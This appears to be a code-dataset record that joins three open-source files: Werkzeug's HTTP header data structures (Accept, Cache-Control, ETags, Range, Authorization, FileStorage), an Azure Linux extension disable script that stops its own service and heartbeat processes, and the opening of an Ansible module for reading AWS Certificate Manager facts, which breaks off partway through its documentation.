class ImmutableDict(ImmutableDictMixin, dict):
"""An immutable :class:`dict`.
.. versionadded:: 0.5
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return dict(self)
def __copy__(self):
return self
class ImmutableMultiDict(ImmutableMultiDictMixin, MultiDict):
"""An immutable :class:`MultiDict`.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return MultiDict(self)
def __copy__(self):
return self
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, OrderedMultiDict):
"""An immutable :class:`OrderedMultiDict`.
.. versionadded:: 0.6
"""
def _iter_hashitems(self):
return enumerate(iteritems(self, multi=True))
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return OrderedMultiDict(self)
def __copy__(self):
return self
@native_itermethods(['values'])
class Accept(ImmutableList):
"""An :class:`Accept` object is just a list subclass for lists of
``(value, quality)`` tuples. It is automatically sorted by quality.
All :class:`Accept` objects work similar to a list but provide extra
functionality for working with the data. Containment checks are
normalized to the rules of that header:
>>> a = CharsetAccept([('ISO-8859-1', 1), ('utf-8', 0.7)])
>>> a.best
'ISO-8859-1'
>>> 'iso-8859-1' in a
True
>>> 'UTF8' in a
True
>>> 'utf7' in a
False
To get the quality for an item you can use normal item lookup:
>>> print a['utf-8']
0.7
>>> a['utf7']
0
.. versionchanged:: 0.5
:class:`Accept` objects are forced immutable now.
"""
def __init__(self, values=()):
if values is None:
list.__init__(self)
self.provided = False
elif isinstance(values, Accept):
self.provided = values.provided
list.__init__(self, values)
else:
self.provided = True
values = [(a, b) for b, a in values]
values.sort()
values.reverse()
list.__init__(self, [(a, b) for b, a in values])
def _value_matches(self, value, item):
"""Check if a value matches a given accept item."""
return item == '*' or item.lower() == value.lower()
def __getitem__(self, key):
"""Besides index lookup (getting item n) you can also pass it a string
to get the quality for the item. If the item is not in the list, the
returned quality is ``0``.
"""
if isinstance(key, string_types):
return self.quality(key)
return list.__getitem__(self, key)
def quality(self, key):
"""Returns the quality of the key.
.. versionadded:: 0.6
In previous versions you had to use the item-lookup syntax
(eg: ``obj[key]`` instead of ``obj.quality(key)``)
"""
for item, quality in self:
if self._value_matches(key, item):
return quality
return 0
def __contains__(self, value):
for item, quality in self:
if self._value_matches(value, item):
return True
return False
def __repr__(self):
return '%s([%s])' % (
self.__class__.__name__,
', '.join('(%r, %s)' % (x, y) for x, y in self)
)
def index(self, key):
"""Get the position of an entry or raise :exc:`ValueError`.
:param key: The key to be looked up.
.. versionchanged:: 0.5
This used to raise :exc:`IndexError`, which was inconsistent
with the list API.
"""
if isinstance(key, string_types):
for idx, (item, quality) in enumerate(self):
if self._value_matches(key, item):
return idx
raise ValueError(key)
return list.index(self, key)
def find(self, key):
"""Get the position of an entry or return -1.
:param key: The key to be looked up.
"""
try:
return self.index(key)
except ValueError:
return -1
def values(self):
"""Iterate over all values."""
for item in self:
yield item[0]
def to_header(self):
"""Convert the header set into an HTTP header string."""
result = []
for value, quality in self:
if quality != 1:
value = '%s;q=%s' % (value, quality)
result.append(value)
return ','.join(result)
def __str__(self):
return self.to_header()
def best_match(self, matches, default=None):
"""Returns the best match from a list of possible matches based
on the quality of the client. If two items have the same quality,
the one is returned that comes first.
:param matches: a list of matches to check for
:param default: the value that is returned if none match
"""
best_quality = -1
result = default
for server_item in matches:
for client_item, quality in self:
if quality <= best_quality:
break
if self._value_matches(server_item, client_item):
best_quality = quality
result = server_item
return result
@property
def best(self):
"""The best match as value."""
if self:
return self[0][0]
class MIMEAccept(Accept):
"""Like :class:`Accept` but with special methods and behavior for
mimetypes.
"""
def _value_matches(self, value, item):
def _normalize(x):
x = x.lower()
return x == '*' and ('*', '*') or x.split('/', 1)
# this is from the application which is trusted. to avoid developer
# frustration we actually check these for valid values
if '/' not in value:
raise ValueError('invalid mimetype %r' % value)
value_type, value_subtype = _normalize(value)
if value_type == '*' and value_subtype != '*':
raise ValueError('invalid mimetype %r' % value)
if '/' not in item:
return False
item_type, item_subtype = _normalize(item)
if item_type == '*' and item_subtype != '*':
return False
return (
(item_type == item_subtype == '*' or
value_type == value_subtype == '*') or
(item_type == value_type and (item_subtype == '*' or
value_subtype == '*' or
item_subtype == value_subtype))
)
@property
def accept_html(self):
"""True if this object accepts HTML."""
return (
'text/html' in self or
'application/xhtml+xml' in self or
self.accept_xhtml
)
@property
def accept_xhtml(self):
"""True if this object accepts XHTML."""
return (
'application/xhtml+xml' in self or
'application/xml' in self
)
@property
def accept_json(self):
"""True if this object accepts JSON."""
return 'application/json' in self
class LanguageAccept(Accept):
"""Like :class:`Accept` but with normalization for languages."""
def _value_matches(self, value, item):
def _normalize(language):
return _locale_delim_re.split(language.lower())
return item == '*' or _normalize(value) == _normalize(item)
class CharsetAccept(Accept):
"""Like :class:`Accept` but with normalization for charsets."""
def _value_matches(self, value, item):
def _normalize(name):
try:
return codecs.lookup(name).name
except LookupError:
return name.lower()
return item == '*' or _normalize(value) == _normalize(item)
def cache_property(key, empty, type):
"""Return a new property object for a cache header. Useful if you
want to add support for a cache extension in a subclass."""
return property(lambda x: x._get_cache_value(key, empty, type),
lambda x, v: x._set_cache_value(key, v, type),
lambda x: x._del_cache_value(key),
'accessor for %r' % key)
class _CacheControl(UpdateDictMixin, dict):
"""Subclass of a dict that stores values for a Cache-Control header. It
has accessors for all the cache-control directives specified in RFC 2616.
The class does not differentiate between request and response directives.
Because the cache-control directives in the HTTP header use dashes the
python descriptors use underscores for that.
To get a header of the :class:`CacheControl` object again you can convert
the object into a string or call the :meth:`to_header` method. If you plan
to subclass it and add your own items have a look at the sourcecode for
that class.
.. versionchanged:: 0.4
Setting `no_cache` or `private` to boolean `True` will set the implicit
none-value which is ``*``:
>>> cc = ResponseCacheControl()
>>> cc.no_cache = True
>>> cc
<ResponseCacheControl 'no-cache'>
>>> cc.no_cache
'*'
>>> cc.no_cache = None
>>> cc
<ResponseCacheControl ''>
In versions before 0.5 the behavior documented here affected the now
no longer existing `CacheControl` class.
"""
no_cache = cache_property('no-cache', '*', None)
no_store = cache_property('no-store', None, bool)
max_age = cache_property('max-age', -1, int)
no_transform = cache_property('no-transform', None, None)
def __init__(self, values=(), on_update=None):
dict.__init__(self, values or ())
self.on_update = on_update
self.provided = values is not None
def _get_cache_value(self, key, empty, type):
"""Used internally by the accessor properties."""
if type is bool:
return key in self
if key in self:
value = self[key]
if value is None:
return empty
elif type is not None:
try:
value = type(value)
except ValueError:
pass
return value
def _set_cache_value(self, key, value, type):
"""Used internally by the accessor properties."""
if type is bool:
if value:
self[key] = None
else:
self.pop(key, None)
else:
if value is None:
self.pop(key)
elif value is True:
self[key] = None
else:
self[key] = value
def _del_cache_value(self, key):
"""Used internally by the accessor properties."""
if key in self:
del self[key]
def to_header(self):
"""Convert the stored values into a cache control header."""
return dump_header(self)
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
class RequestCacheControl(ImmutableDictMixin, _CacheControl):
"""A cache control for requests. This is immutable and gives access
to all the request-relevant cache control headers.
To get a header of the :class:`RequestCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
max_stale = cache_property('max-stale', '*', int)
min_fresh = cache_property('min-fresh', '*', int)
no_transform = cache_property('no-transform', None, None)
only_if_cached = cache_property('only-if-cached', None, bool)
class ResponseCacheControl(_CacheControl):
"""A cache control for responses. Unlike :class:`RequestCacheControl`
this is mutable and gives access to response-relevant cache control
headers.
To get a header of the :class:`ResponseCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
public = cache_property('public', None, bool)
private = cache_property('private', '*', None)
must_revalidate = cache_property('must-revalidate', None, bool)
proxy_revalidate = cache_property('proxy-revalidate', None, bool)
s_maxage = cache_property('s-maxage', None, None)
# attach cache_property to the _CacheControl as staticmethod
# so that others can reuse it.
_CacheControl.cache_property = staticmethod(cache_property)
class CallbackDict(UpdateDictMixin, dict):
"""A dict that calls a function passed every time something is changed.
The function is passed the dict instance.
"""
def __init__(self, initial=None, on_update=None):
dict.__init__(self, initial or ())
self.on_update = on_update
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
dict.__repr__(self)
)
class HeaderSet(object):
"""Similar to the :class:`ETags` class this implements a set-like structure.
Unlike :class:`ETags` this is case insensitive and used for vary, allow, and
content-language headers.
If not constructed using the :func:`parse_set_header` function the
instantiation works like this:
>>> hs = HeaderSet(['foo', 'bar', 'baz'])
>>> hs
HeaderSet(['foo', 'bar', 'baz'])
"""
def __init__(self, headers=None, on_update=None):
self._headers = list(headers or ())
self._set = set([x.lower() for x in self._headers])
self.on_update = on_update
def add(self, header):
"""Add a new header to the set."""
self.update((header,))
def remove(self, header):
"""Remove a header from the set. This raises an :exc:`KeyError` if the
header is not in the set.
.. versionchanged:: 0.5
In older versions a :exc:`IndexError` was raised instead of a
:exc:`KeyError` if the object was missing.
:param header: the header to be removed.
"""
key = header.lower()
if key not in self._set:
raise KeyError(header)
self._set.remove(key)
for idx, key in enumerate(self._headers):
if key.lower() == header:
del self._headers[idx]
break
if self.on_update is not None:
self.on_update(self)
def update(self, iterable):
"""Add all the headers from the iterable to the set.
:param iterable: updates the set with the items from the iterable.
"""
inserted_any = False
for header in iterable:
key = header.lower()
if key not in self._set:
self._headers.append(header)
self._set.add(key)
inserted_any = True
if inserted_any and self.on_update is not None:
self.on_update(self)
def discard(self, header):
"""Like :meth:`remove` but ignores errors.
:param header: the header to be discarded.
"""
try:
return self.remove(header)
except KeyError:
pass
def find(self, header):
"""Return the index of the header in the set or return -1 if not found.
:param header: the header to be looked up.
"""
header = header.lower()
for idx, item in enumerate(self._headers):
if item.lower() == header:
return idx
return -1
def index(self, header):
"""Return the index of the header in the set or raise an
:exc:`IndexError`.
:param header: the header to be looked up.
"""
rv = self.find(header)
if rv < 0:
raise IndexError(header)
return rv
def clear(self):
"""Clear the set."""
self._set.clear()
del self._headers[:]
if self.on_update is not None:
self.on_update(self)
def as_set(self, preserve_casing=False):
"""Return the set as real python set type. When calling this, all
the items are converted to lowercase and the ordering is lost.
:param preserve_casing: if set to `True` the items in the set returned
will have the original case like in the
:class:`HeaderSet`, otherwise they will
be lowercase.
"""
if preserve_casing:
return set(self._headers)
return set(self._set)
def to_header(self):
"""Convert the header set into an HTTP header string."""
return ', '.join(map(quote_header_value, self._headers))
def __getitem__(self, idx):
return self._headers[idx]
def __delitem__(self, idx):
rv = self._headers.pop(idx)
self._set.remove(rv.lower())
if self.on_update is not None:
self.on_update(self)
def __setitem__(self, idx, value):
old = self._headers[idx]
self._set.remove(old.lower())
self._headers[idx] = value
self._set.add(value.lower())
if self.on_update is not None:
self.on_update(self)
def __contains__(self, header):
return header.lower() in self._set
def __len__(self):
return len(self._set)
def __iter__(self):
return iter(self._headers)
def __nonzero__(self):
return bool(self._set)
def __str__(self):
return self.to_header()
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self._headers
)
class ETags(object):
"""A set that can be used to check if one etag is present in a collection
of etags.
"""
def __init__(self, strong_etags=None, weak_etags=None, star_tag=False):
self._strong = frozenset(not star_tag and strong_etags or ())
self._weak = frozenset(weak_etags or ())
self.star_tag = star_tag
def as_set(self, include_weak=False):
"""Convert the `ETags` object into a python set. Per default all the
weak etags are not part of this set."""
rv = set(self._strong)
if include_weak:
rv.update(self._weak)
return rv
def is_weak(self, etag):
"""Check if an etag is weak."""
return etag in self._weak
def contains_weak(self, etag):
"""Check if an etag is part of the set including weak and strong tags."""
return self.is_weak(etag) or self.contains(etag)
def contains(self, etag):
"""Check if an etag is part of the set ignoring weak tags.
It is also possible to use the ``in`` operator.
"""
if self.star_tag:
return True
return etag in self._strong
def contains_raw(self, etag):
"""When passed a quoted tag it will check if this tag is part of the
set. If the tag is weak it is checked against weak and strong tags,
otherwise strong only."""
etag, weak = unquote_etag(etag)
if weak:
return self.contains_weak(etag)
return self.contains(etag)
def to_header(self):
"""Convert the etags set into a HTTP header string."""
if self.star_tag:
return '*'
return ', '.join(
['"%s"' % x for x in self._strong] +
['w/"%s"' % x for x in self._weak]
)
def __call__(self, etag=None, data=None, include_weak=False):
if [etag, data].count(None) != 1:
raise TypeError('either tag or data required, but at least one')
if etag is None:
etag = generate_etag(data)
if include_weak:
if etag in self._weak:
return True
return etag in self._strong
def __nonzero__(self):
return bool(self.star_tag or self._strong or self._weak)
def __str__(self):
return self.to_header()
def __iter__(self):
return iter(self._strong)
def __contains__(self, etag):
return self.contains(etag)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class IfRange(object):
"""Very simple object that represents the `If-Range` header in parsed
form. It will either have neither a etag or date or one of either but
never both.
.. versionadded:: 0.7
"""
def __init__(self, etag=None, date=None):
#: The etag parsed and unquoted. Ranges always operate on strong
#: etags so the weakness information is not necessary.
self.etag = etag
#: The date in parsed format or `None`.
self.date = date
def to_header(self):
"""Converts the object back into an HTTP header."""
if self.date is not None:
return http_date(self.date)
if self.etag is not None:
return quote_etag(self.etag)
return ''
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Range(object):
"""Represents a range header. All the methods are only supporting bytes
as unit. It does store multiple ranges but :meth:`range_for_length` will
only work if only one range is provided.
.. versionadded:: 0.7
"""
def __init__(self, units, ranges):
#: The units of this range. Usually "bytes".
self.units = units
#: A list of ``(begin, end)`` tuples for the range header provided.
#: The ranges are non-inclusive.
self.ranges = ranges
def range_for_length(self, length):
"""If the range is for bytes, the length is not None and there is
exactly one range and it is satisfiable it returns a ``(start, stop)``
tuple, otherwise `None`.
"""
if self.units != 'bytes' or length is None or len(self.ranges) != 1:
return None
start, end = self.ranges[0]
if end is None:
end = length
if start < 0:
start += length
if is_byte_range_valid(start, end, length):
return start, min(end, length)
def make_content_range(self, length):
"""Creates a :class:`~werkzeug.datastructures.ContentRange` object
from the current range and given content length.
"""
rng = self.range_for_length(length)
if rng is not None:
return ContentRange(self.units, rng[0], rng[1], length)
def to_header(self):
"""Converts the object back into an HTTP header."""
ranges = []
for begin, end in self.ranges:
if end is None:
ranges.append(begin >= 0 and '%s-' % begin or str(begin))
else:
ranges.append('%s-%s' % (begin, end - 1))
return '%s=%s' % (self.units, ','.join(ranges))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class ContentRange(object):
"""Represents the content range header.
.. versionadded:: 0.7
"""
def __init__(self, units, start, stop, length=None, on_update=None):
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self.on_update = on_update
self.set(start, stop, length, units)
def _callback_property(name):
def fget(self):
return getattr(self, name)
def fset(self, value):
setattr(self, name, value)
if self.on_update is not None:
self.on_update(self)
return property(fget, fset)
#: The units to use, usually "bytes"
units = _callback_property('_units')
#: The start point of the range or `None`.
start = _callback_property('_start')
#: The stop point of the range (non-inclusive) or `None`. Can only be
#: `None` if also start is `None`.
stop = _callback_property('_stop')
#: The length of the range or `None`.
length = _callback_property('_length')
def set(self, start, stop, length=None, units='bytes'):
"""Simple method to update the ranges."""
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self._units = units
self._start = start
self._stop = stop
self._length = length
if self.on_update is not None:
self.on_update(self)
def unset(self):
"""Sets the units to `None` which indicates that the header should
no longer be used.
"""
self.set(None, None, units=None)
def to_header(self):
if self.units is None:
return ''
if self.length is None:
length = '*'
else:
length = self.length
if self.start is None:
return '%s */%s' % (self.units, length)
return '%s %s-%s/%s' % (
self.units,
self.start,
self.stop - 1,
length
)
def __nonzero__(self):
return self.units is not None
__bool__ = __nonzero__
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Authorization(ImmutableDictMixin, dict):
"""Represents an `Authorization` header sent by the client. You should
not create this kind of object yourself but use it when it's returned by
the `parse_authorization_header` function.
This object is a dict subclass and can be altered by setting dict items
but it should be considered immutable as it's returned by the client and
not meant for modifications.
.. versionchanged:: 0.5
This object became immutable.
"""
def __init__(self, auth_type, data=None):
dict.__init__(self, data or {})
self.type = auth_type
username = property(lambda x: x.get('username'), doc='''
The username transmitted. This is set for both basic and digest
auth all the time.''')
password = property(lambda x: x.get('password'), doc='''
When the authentication type is basic this is the password
transmitted by the client, else `None`.''')
realm = property(lambda x: x.get('realm'), doc='''
This is the server realm sent back for HTTP digest auth.''')
nonce = property(lambda x: x.get('nonce'), doc='''
The nonce the server sent for digest auth, sent back by the client.
A nonce should be unique for every 401 response for HTTP digest
auth.''')
uri = property(lambda x: x.get('uri'), doc='''
The URI from Request-URI of the Request-Line; duplicated because
proxies are allowed to change the Request-Line in transit. HTTP
digest auth only.''')
nc = property(lambda x: x.get('nc'), doc='''
The nonce count value transmitted by clients if a qop-header is
also transmitted. HTTP digest auth only.''')
cnonce = property(lambda x: x.get('cnonce'), doc='''
If the server sent a qop-header in the ``WWW-Authenticate``
header, the client has to provide this value for HTTP digest auth.
See the RFC for more details.''')
response = property(lambda x: x.get('response'), doc='''
A string of 32 hex digits computed as defined in RFC 2617, which
proves that the user knows a password. Digest auth only.''')
opaque = property(lambda x: x.get('opaque'), doc='''
The opaque header from the server returned unchanged by the client.
It is recommended that this string be base64 or hexadecimal data.
Digest auth only.''')
@property
def qop(self):
"""Indicates what "quality of protection" the client has applied to
the message for HTTP digest auth."""
def on_update(header_set):
if not header_set and 'qop' in self:
del self['qop']
elif header_set:
self['qop'] = header_set.to_header()
return parse_set_header(self.get('qop'), on_update)
class WWWAuthenticate(UpdateDictMixin, dict):
"""Provides simple access to `WWW-Authenticate` headers."""
#: list of keys that require quoting in the generated header
_require_quoting = frozenset(['domain', 'nonce', 'opaque', 'realm'])
def __init__(self, auth_type=None, values=None, on_update=None):
dict.__init__(self, values or ())
if auth_type:
self['__auth_type__'] = auth_type
self.on_update = on_update
def set_basic(self, realm='authentication required'):
"""Clear the auth info and enable basic auth."""
dict.clear(self)
dict.update(self, {'__auth_type__': 'basic', 'realm': realm})
if self.on_update:
self.on_update(self)
def set_digest(self, realm, nonce, qop=('auth',), opaque=None,
algorithm=None, stale=False):
"""Clear the auth info and enable digest auth."""
d = {
'__auth_type__': 'digest',
'realm': realm,
'nonce': nonce,
'qop': dump_header(qop)
}
if stale:
d['stale'] = 'TRUE'
if opaque is not None:
d['opaque'] = opaque
if algorithm is not None:
d['algorithm'] = algorithm
dict.clear(self)
dict.update(self, d)
if self.on_update:
self.on_update(self)
def to_header(self):
"""Convert the stored values into a WWW-Authenticate header."""
d = dict(self)
auth_type = d.pop('__auth_type__', None) or 'basic'
return '%s %s' % (auth_type.title(), ', '.join([
'%s=%s' % (key, quote_header_value(value,
allow_token=key not in self._require_quoting))
for key, value in iteritems(d)
]))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
def auth_property(name, doc=None):
"""A static helper function for subclasses to add extra authentication
system properties onto a class::
class FooAuthenticate(WWWAuthenticate):
special_realm = auth_property('special_realm')
For more information have a look at the sourcecode to see how the
regular properties (:attr:`realm` etc.) are implemented.
"""
def _set_value(self, value):
if value is None:
self.pop(name, None)
else:
self[name] = str(value)
return property(lambda x: x.get(name), _set_value, doc=doc)
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self:
del self[name]
elif header_set:
self[name] = header_set.to_header()
return parse_set_header(self.get(name), on_update)
return property(fget, doc=doc)
type = auth_property('__auth_type__', doc='''
The type of the auth mechanism. HTTP currently specifies
`Basic` and `Digest`.''')
realm = auth_property('realm', doc='''
A string to be displayed to users so they know which username and
password to use. This string should contain at least the name of
the host performing the authentication and might additionally
indicate the collection of users who might have access.''')
domain = _set_property('domain', doc='''
A list of URIs that define the protection space. If a URI is an
absolute path, it is relative to the canonical root URL of the
server being accessed.''')
nonce = auth_property('nonce', doc='''
A server-specified data string which should be uniquely generated
each time a 401 response is made. It is recommended that this
string be base64 or hexadecimal data.''')
opaque = auth_property('opaque', doc='''
A string of data, specified by the server, which should be returned
by the client unchanged in the Authorization header of subsequent
requests with URIs in the same protection space. It is recommended
that this string be base64 or hexadecimal data.''')
algorithm = auth_property('algorithm', doc='''
A string indicating a pair of algorithms used to produce the digest
and a checksum. If this is not present it is assumed to be "MD5".
If the algorithm is not understood, the challenge should be ignored
(and a different one used, if there is more than one).''')
qop = _set_property('qop', doc='''
A set of quality-of-privacy directives such as auth and auth-int.''')
def _get_stale(self):
val = self.get('stale')
if val is not None:
return val.lower() == 'true'
def _set_stale(self, value):
if value is None:
self.pop('stale', None)
else:
self['stale'] = value and 'TRUE' or 'FALSE'
stale = property(_get_stale, _set_stale, doc='''
A flag, indicating that the previous request from the client was
rejected because the nonce value was stale.''')
del _get_stale, _set_stale
# make auth_property a staticmethod so that subclasses of
# `WWWAuthenticate` can use it for new properties.
auth_property = staticmethod(auth_property)
del _set_property
class FileStorage(object):
"""The :class:`FileStorage` class is a thin wrapper over incoming files.
It is used by the request object to represent uploaded files. All the
attributes of the wrapper stream are proxied by the file storage so
it's possible to do ``storage.read()`` instead of the long form
``storage.stream.read()``.
"""
def __init__(self, stream=None, filename=None, name=None,
content_type=None, content_length=None,
headers=None):
self.name = name
self.stream = stream or _empty_stream
# if no filename is provided we can attempt to get the filename
# from the stream object passed. There we have to be careful to
# skip things like <fdopen>, <stderr> etc. Python marks these
# special filenames with angular brackets.
if filename is None:
filename = getattr(stream, 'name', None)
s = make_literal_wrapper(filename)
if filename and filename[0] == s('<') and filename[-1] == s('>'):
filename = None
# On Python 3 we want to make sure the filename is always unicode.
# This might not be if the name attribute is bytes due to the
# file being opened from the bytes API.
if not PY2 and isinstance(filename, bytes):
filename = filename.decode(sys.getfilesystemencoding(),
'replace')
self.filename = filename
if headers is None:
headers = Headers()
self.headers = headers
if content_type is not None:
headers['Content-Type'] = content_type
if content_length is not None:
headers['Content-Length'] = str(content_length)
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.content_type)
@property
def content_type(self):
"""The content-type sent in the header. Usually not available"""
return self.headers.get('content-type')
@property
def content_length(self):
"""The content-length sent in the header. Usually not available"""
return int(self.headers.get('content-length') or 0)
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[1]
def save(self, dst, buffer_size=16384):
"""Save the file to a destination path or file object. If the
destination is a file object you have to close it yourself after the
call. The buffer size is the number of bytes held in memory during
the copy process. It defaults to 16KB.
For secure file saving also have a look at :func:`secure_filename`.
:param dst: a filename or open file object the uploaded file
is saved to.
:param buffer_size: the size of the buffer. This works the same as
the `length` parameter of
:func:`shutil.copyfileobj`.
"""
from shutil import copyfileobj
close_dst = False
if isinstance(dst, string_types):
dst = open(dst, 'wb')
close_dst = True
try:
copyfileobj(self.stream, dst, buffer_size)
finally:
if close_dst:
dst.close()
def close(self):
"""Close the underlying file if possible."""
try:
self.stream.close()
except Exception:
pass
def __nonzero__(self):
return bool(self.filename)
def __getattr__(self, name):
return getattr(self.stream, name)
def __iter__(self):
return iter(self.readline, '')
def __repr__(self):
return '<%s: %r (%r)>' % (
self.__class__.__name__,
self.filename,
self.content_type
)
# circular dependencies
from werkzeug.http import dump_options_header, dump_header, generate_etag, \
quote_header_value, parse_set_header, unquote_etag, quote_etag, \
parse_options_header, http_date, is_byte_range_valid
from werkzeug import exceptions
| gpl-3.0 |
Azure/azure-linux-extensions | TestHandlerLinux/bin/disable.py | 16 | 3241 | #!/usr/bin/env python
"""
Example Azure Handler script for Linux IaaS
Diable example
"""
import os
import imp
import time
import json
waagent=imp.load_source('waagent','/usr/sbin/waagent')
from waagent import LoggerInit
hutil=imp.load_source('HandlerUtil','./resources/HandlerUtil.py')
LoggerInit('/var/log/waagent.log','/dev/stdout')
waagent.Log("disable.py starting.")
logfile=waagent.Log
name,seqNo,version,config_dir,log_dir,settings_file,status_file,heartbeat_file,config=hutil.doParse(logfile,'Disable')
LoggerInit('/var/log/'+name+'_Disable.log','/dev/stdout')
waagent.Log(name+" - disable.py starting.")
logfile=waagent.Log
hutil.doStatusReport(name,seqNo,version,status_file,time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),
time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),name,
'Disable', 'transitioning', '0', 'Disabling', 'Process Config', 'transitioning', '0', 'Parsing ' + settings_file)
hutil.doHealthReport(heartbeat_file,'NotReady','0','Proccessing Settings')
error_string=''
pid=None
pidfile='./service_pid.txt'
if not os.path.isfile(pidfile):
error_string += pidfile +" is missing."
error_string = "Error: " + error_string
waagent.Error(error_string)
hutil.doStatusReport(name,seqNo,version,status_file,time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),
time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),name,
'Disable', 'transitioning', '0', 'Disabling', 'Process Config', 'transitioning', '0', 'Parsing ' + settings_file)
else:
pid = waagent.GetFileContents(pidfile)
#stop service.py
try:
os.kill(int(pid),7)
except Exception as e:
pass
# remove pifdile
try:
os.unlink(pidfile)
except Exception as e:
pass
#Kill heartbeat.py if required.
manifest = waagent.GetFileContents('./HandlerManifest.json')
try:
s=json.loads(manifest)
except:
waagent.Error('Error parsing HandlerManifest.json. Heath report will not be available.')
hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service.py succeeded.' + str(pid) + ' created.', 'Exit Successfull', 'success', '0', 'Enable Completed.','NotReady','0',name+' enabled.')
if s[0]['handlerManifest']['reportHeartbeat'] != True :
hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service.py succeeded.' + str(pid) + ' created.', 'Exit Successfull', 'success', '0', 'Enable Completed.','Ready','0',name+' enabled.')
try:
pid = waagent.GetFileContents('./heartbeat.pid')
except:
waagent.Error('Error reading ./heartbeat.pid.')
hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service.py succeeded.' + str(pid) + ' created.', 'Exit Successfull', 'success', '0', 'Enable Completed.','NotReady','0',name+' enabled.')
if waagent.Run('kill '+pid)==0:
waagent.Log(name+" disabled.")
hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service Succeed. Health reporting stoppped.', 'Exit Successfull', 'success', '0', 'Disable Completed.','NotReady','0',name+' disabled.')
| apache-2.0 |
jmighion/ansible | lib/ansible/modules/cloud/amazon/aws_acm_facts.py | 14 | 11659 | #!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: aws_acm_facts
short_description: Retrieve certificate facts from AWS Certificate Manager service
description:
- Retrieve facts for ACM certificates
version_added: "2.5"
options:
name:
description:
- The name of an ACM certificate
status:
description:
- Status to filter the certificate results
choices: ['PENDING_VALIDATION', 'ISSUED', 'INACTIVE', 'EXPIRED', 'VALIDATION_TIMED_OUT']
requirements:
- boto3
author:
- Will Thames (@willthames)
extends_documentation_fragment: aws
'''
EXAMPLES = '''
- name: obtain all ACM certificates
aws_acm_facts:
- name: obtain all facts for a single ACM certificate
aws_acm_facts:
name: "*.example_com"
- name: obtain all certificates pending validiation
aws_acm_facts:
statuses:
- PENDING_VALIDATION
'''
RETURN = '''
certificates:
description: A list of certificates
returned: always
type: complex
contains:
certificate:
description: The ACM Certificate body
returned: when certificate creation is complete
sample: '-----BEGIN CERTIFICATE-----\\nMII.....-----END CERTIFICATE-----\\n'
type: string
certificate_arn:
description: Certificate ARN
returned: always
sample: arn:aws:acm:ap-southeast-2:123456789012:certificate/abcd1234-abcd-1234-abcd-123456789abc
type: string
certificate_chain:
description: Full certificate chain for the certificate
returned: when certificate creation is complete
sample: '-----BEGIN CERTIFICATE-----\\nMII...\\n-----END CERTIFICATE-----\\n-----BEGIN CERTIFICATE-----\\n...'
type: string
created_at:
description: Date certificate was created
returned: always
sample: '2017-08-15T10:31:19+10:00'
type: string
domain_name:
description: Domain name for the certificate
returned: always
sample: '*.example.com'
type: string
domain_validation_options:
description: Options used by ACM to validate the certificate
returned: when certificate type is AMAZON_ISSUED
type: complex
contains:
domain_name:
description: Fully qualified domain name of the certificate
returned: always
sample: example.com
type: string
validation_domain:
description: The domain name ACM used to send validation emails
returned: always
sample: example.com
type: string
validation_emails:
description: A list of email addresses that ACM used to send domain validation emails
returned: always
sample:
- admin@example.com
- postmaster@example.com
type: list
validation_status:
description: Validation status of the domain
returned: always
sample: SUCCESS
type: string
failure_reason:
description: Reason certificate request failed
returned: only when certificate issuing failed
